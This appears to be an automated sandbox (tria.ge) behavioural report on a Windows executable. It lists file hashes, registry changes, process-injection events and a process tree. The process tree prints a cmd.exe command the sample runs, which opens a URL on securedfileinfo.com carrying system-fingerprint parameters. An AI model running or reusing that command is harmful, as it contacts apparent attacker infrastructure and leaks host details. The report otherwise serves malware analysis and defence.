Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
191s -
max time network
206s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system -
submitted
27/11/2022, 10:05
Static task
static1
Behavioral task
behavioral1
Sample
1062351d40df053e97fb8bd748b4a81a3a0184027de0e8a3cbf514f831d56afa.exe
Resource
win7-20221111-en
Behavioral task
behavioral2
Sample
1062351d40df053e97fb8bd748b4a81a3a0184027de0e8a3cbf514f831d56afa.exe
Resource
win10v2004-20221111-en
General
-
Target
1062351d40df053e97fb8bd748b4a81a3a0184027de0e8a3cbf514f831d56afa.exe
-
Size
143KB
-
MD5
d12e184bc2f11321a3746b39baede836
-
SHA1
f8acc9b2f215941eedf684ad9119a4a7a2d19e55
-
SHA256
1062351d40df053e97fb8bd748b4a81a3a0184027de0e8a3cbf514f831d56afa
-
SHA512
9d0bb4198e0f0e19d6d355de86c5ce545cea7e99a2c6b845c523ba616ac629869921315adf91064f1be92ded5ea922ffd2473038c7414fd7ecbf05d7c43f71d8
-
SSDEEP
3072:iN6ZekwVJIlgps5q9Eb648qwlS/+TfQO45Dg:pe9IB83ID50
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
description ioc Process Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "376383120" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\SearchScopes iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003bad9e5810411a41b405bdc87c3b0eb800000000020000000000106600000001000020000000a80290075f617349891a4956bfbc1d50090ac2b3f0cd924f69e63787aac3d689000000000e8000000002000020000000eacb00f6ec28de672131bcf9b383362e045ad255579ecb33a8878d6a2be2cf3d200000006e185626433bf8f8db25091fb04bf9112b1bb0b832c3d42b7cca0fdb2826298740000000a1ca1077aa99e0ee6930375382b13732b073684e90b43f601896d1eee932f3843210ab5caf8f2be9b9c0a2bcd2457dc13e5cd37e20b18dd3b199ffc29417d005 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{BAE6A861-6EE8-11ED-A5FF-56A236AC5043} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = a0861eb5f502d901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000003bad9e5810411a41b405bdc87c3b0eb800000000020000000000106600000001000020000000c543e803188c6520823a81253a846d31d6a5c5f2ee1089210655bf5433ca08b0000000000e80000000020000200000008d4b3bc86a42b928f5843b2b08a40e51d7e51843e05e4b555889538210faf660900000008efa382fd1d0d67d12f8832c70ea5389a205e1463fb2c6d626dea19ab6584d405ce1f7d4d8379eeb6d3de6cd313134c2a7435036328847980ff13cfd8b6f0d1908b8f6228f1444eec5ec525d8bf2eca40e32203a55c456a1a0ccc91ccfae52e2b210e73d83e5475251adf452e170da69bfa1b2beefc24880090f500604b11caa9f3c31dcc830a4c6331d5405f09ab7c940000000d9d9b5def5fdcfa2d945287fd6a04b57121dd848565293326168d4b8333dd6cb62212a4bd8786c6313349d6d9a3959468fd2a4a03f61e5e76604e31329d6986f iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-1214520366-621468234-4062160515-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" iexplore.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 940 1062351d40df053e97fb8bd748b4a81a3a0184027de0e8a3cbf514f831d56afa.exe 1312 iexplore.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 940 1062351d40df053e97fb8bd748b4a81a3a0184027de0e8a3cbf514f831d56afa.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1312 iexplore.exe 1312 iexplore.exe 704 IEXPLORE.EXE 704 IEXPLORE.EXE 704 IEXPLORE.EXE 704 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 940 wrote to memory of 1004 940 1062351d40df053e97fb8bd748b4a81a3a0184027de0e8a3cbf514f831d56afa.exe 30 PID 940 wrote to memory of 1004 940 1062351d40df053e97fb8bd748b4a81a3a0184027de0e8a3cbf514f831d56afa.exe 30 PID 940 wrote to memory of 1004 940 1062351d40df053e97fb8bd748b4a81a3a0184027de0e8a3cbf514f831d56afa.exe 30 PID 940 wrote to memory of 1004 940 1062351d40df053e97fb8bd748b4a81a3a0184027de0e8a3cbf514f831d56afa.exe 30 PID 1004 wrote to memory of 1312 1004 cmd.exe 32 PID 1004 wrote to memory of 1312 1004 cmd.exe 32 PID 1004 wrote to memory of 1312 1004 cmd.exe 32 PID 1004 wrote to memory of 1312 1004 cmd.exe 32 PID 1312 wrote to memory of 704 1312 iexplore.exe 33 PID 1312 wrote to memory of 704 1312 iexplore.exe 33 PID 1312 wrote to memory of 704 1312 iexplore.exe 33 PID 1312 wrote to memory of 704 1312 iexplore.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\1062351d40df053e97fb8bd748b4a81a3a0184027de0e8a3cbf514f831d56afa.exe"C:\Users\Admin\AppData\Local\Temp\1062351d40df053e97fb8bd748b4a81a3a0184027de0e8a3cbf514f831d56afa.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c "start http://securedfileinfo.com/404.jsp?chid=4300109^&rsn=plde^&details=^|v6.1.7601x64sp1.0ws^|tt39^|dt0^|dc100^|fs-2^|dh0^|ec13^|se12007^|dr4^|ds0^|rs0^|p1"2⤵
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://securedfileinfo.com/404.jsp?chid=4300109&rsn=plde&details=|v6.1.7601x64sp1.0ws|tt39|dt0|dc100|fs-2|dh0|ec13|se12007|dr4|ds0|rs0|p13⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1312 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1312 CREDAT:275457 /prefetch:24⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:704
-
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD57f83b6c03e7c1a42b396093051a17587
SHA195d070e2a3724ea42c64c8a4bdf64da5a3320162
SHA256f48ba76702b8ef2e512780e6af6e230607e62594adfe94e3e4a5e3f7e91b7bd4
SHA512bc6dd4605821db6ace49391fb0e2938691b9e53ff55b830bc7d287119e12e3aefef425261a31611232671611847f2335b632dfccab6b56eaf1501ba14d1d623c
-
Filesize
608B
MD5256b7ae8e051a5518fb6f330c5fa6609
SHA1265624e375f0563d391471d5e0d5ee68f18e8c29
SHA256a9607063467495529f0b9d5d249ca514920e90a427d4caf92528718b0e887dd1
SHA5124251e8a0f053bb2a69630001f81549082fc777be44b706f6932e6341a3e595f28518abf24eba433db3fa27ef55011238ac0a74b6be05e4ac03f4363d36d33606